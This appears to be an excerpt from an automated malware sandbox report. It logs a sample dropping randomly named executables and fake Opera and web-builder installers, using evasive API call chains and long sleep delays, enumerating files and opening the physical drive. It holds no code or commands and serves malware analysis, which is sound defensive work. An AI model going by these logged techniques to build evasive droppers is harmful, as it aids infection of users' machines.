                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Simple Web Builder Free\libgcc_s_dw2-1.dll (copy)Jump to dropped file
                    Source: C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_2403120753276464480.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\Pictures\lUtN2EBQTg4XAhTAimO3WEPd.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\VtYWoqhIxv66SdBYR6iCW9pR.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\sgtzC1bBRzEH97LXPXHm4FVd.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-HIELC.tmp\_isetup\_iscrypt.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\uu6kK0oC1Fx2nv3ruwv5SpiV.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Simple Web Builder Free\libbz2-1.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Simple Web Builder Free\is-05C7R.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Simple Web Builder Free\is-177IU.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Simple Web Builder Free\is-R5M1I.tmpJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\lsTOGQhYLrM0d7OftxaupYqW.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Simple Web Builder Free\is-4024Q.tmpJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\gqqSecZ0iDGmpNUFqal8ttIk.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\Pictures\oL8szwawgpXgbnICrbhJSivs.exeJump to dropped file
                    Source: C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403120853201\opera_packageJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-HIELC.tmp\_isetup\_shfoldr.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Simple Web Builder Free\is-NT0K2.tmpJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\OkQwRZm1uDGIMvmp1IlBrcDl.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\Pictures\oYJcrFAFnphIaAQPo8IrBCWh.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-3TQRB.tmp\_isetup\_iscrypt.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Simple Web Builder Free\is-PANN7.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-3TQRB.tmp\_isetup\_shfoldr.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\7odVnHyI6UBWlRBALo6WuNSW.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_24031207531585744560.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Simple Web Builder Free\unins000.exe (copy)Jump to dropped file
                    Source: C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_24031207530974345608.dllJump to dropped file
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_24031207530527645904.dllJump to dropped file
                    Source: C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Opera_108.0.5067.24_Autoupdate_x64[3].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Simple Web Builder Free\libogg-0.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Simple Web Builder Free\libwinpthread-1.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-HIELC.tmp\_isetup\_setup64.tmpJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\Pictures\sMiDMUawiFqOcW9q4tC0ZctA.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Y4LnHhMyiOb93nCmM4lvPIko.exeJump to dropped file
                    Source: C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_24031207531803244640.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-3TQRB.tmp\_isetup\_setup64.tmpJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\Pictures\W1VpqB7zp2RfA2iQxRvPzC6c.exeJump to dropped file
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_14-5973
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_17-18563
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_16-3249
                    Source: C:\Users\user\Desktop\file.exe TID: 2892Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\file.exe TID: 2892Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\file.exe TID: 2892Thread sleep time: -99875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\file.exe TID: 2892Thread sleep time: -99766s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\file.exe TID: 2892Thread sleep time: -99656s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\file.exe TID: 2892Thread sleep time: -99517s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\file.exe TID: 2892Thread sleep time: -99391s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\file.exe TID: 2892Thread sleep time: -99266s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\file.exe TID: 2892Thread sleep time: -99156s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\file.exe TID: 2892Thread sleep time: -99046s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\file.exe TID: 2892Thread sleep time: -98918s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\file.exe TID: 2892Thread sleep time: -98812s >= -30000sJump to behavior
                    Source: C:\Windows\System32\svchost.exe TID: 4144Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -12912720851596678s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44144Thread sleep time: -1800000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44308Thread sleep count: 8001 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -599859s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44308Thread sleep count: 1635 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -599746s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -599578s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -599249s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -599125s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -599007s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -598755s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -598625s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -598421s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -597125s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -596999s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -596859s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -596703s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -596575s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -596381s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -596250s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -596136s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -596026s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -595920s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -595779s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -595667s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -595558s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -595426s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -595312s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -595200s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -594987s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -594859s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -594691s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -594547s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -594375s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -594214s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -594065s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -593937s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -593828s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -593704s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -593584s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -593453s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -593326s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -593202s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -593090s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -592980s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -592812s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -592672s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -592522s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -592387s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -592264s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -592140s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -592003s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -591875s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -591765s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288Thread sleep time: -591656s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe TID: 44316Thread sleep time: -58000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe TID: 1124Thread sleep time: -120000s >= -30000s
                    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformation
                    Source: C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformation
                    Source: C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformation
                    Source: C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformation
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_00452A60 FindFirstFileA,GetLastError,15_2_00452A60
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_00474F88 FindFirstFileA,FindNextFileA,FindClose,15_2_00474F88
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_004980A4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,15_2_004980A4
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_00464158 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,15_2_00464158
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_00462750 FindFirstFileA,FindNextFileA,FindClose,15_2_00462750
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_00463CDC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,15_2_00463CDC
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeCode function: 21_2_00408123 FindFirstFileA,FindClose,21_2_00408123
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeCode function: 21_2_004085B8 DeleteFileA,DeleteFileA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,21_2_004085B8
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeCode function: 21_2_0040342B FindFirstFileA,21_2_0040342B
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exeCode function: 14_2_00409B78 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,14_2_00409B78
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99875Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99766Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99656Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99517Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99391Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99266Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99156Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99046Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 98918Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 98812Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 300000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599746Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599578Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599249Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599125Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599007Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598755Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598625Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598421Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597125Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596999Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596703Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596575Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596381Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596250Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596136Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596026Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595920Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595779Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595667Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595558Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595426Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595312Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595200Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594987Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594691Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594375Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594214Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594065Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593937Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593828Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593704Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593584Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593326Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593202Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593090Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592980Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592812Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592672Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592522Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592387Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592264Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592140Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592003Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 591875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 591765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 591656Jump to behavior
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeThread delayed: delay time: 60000
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
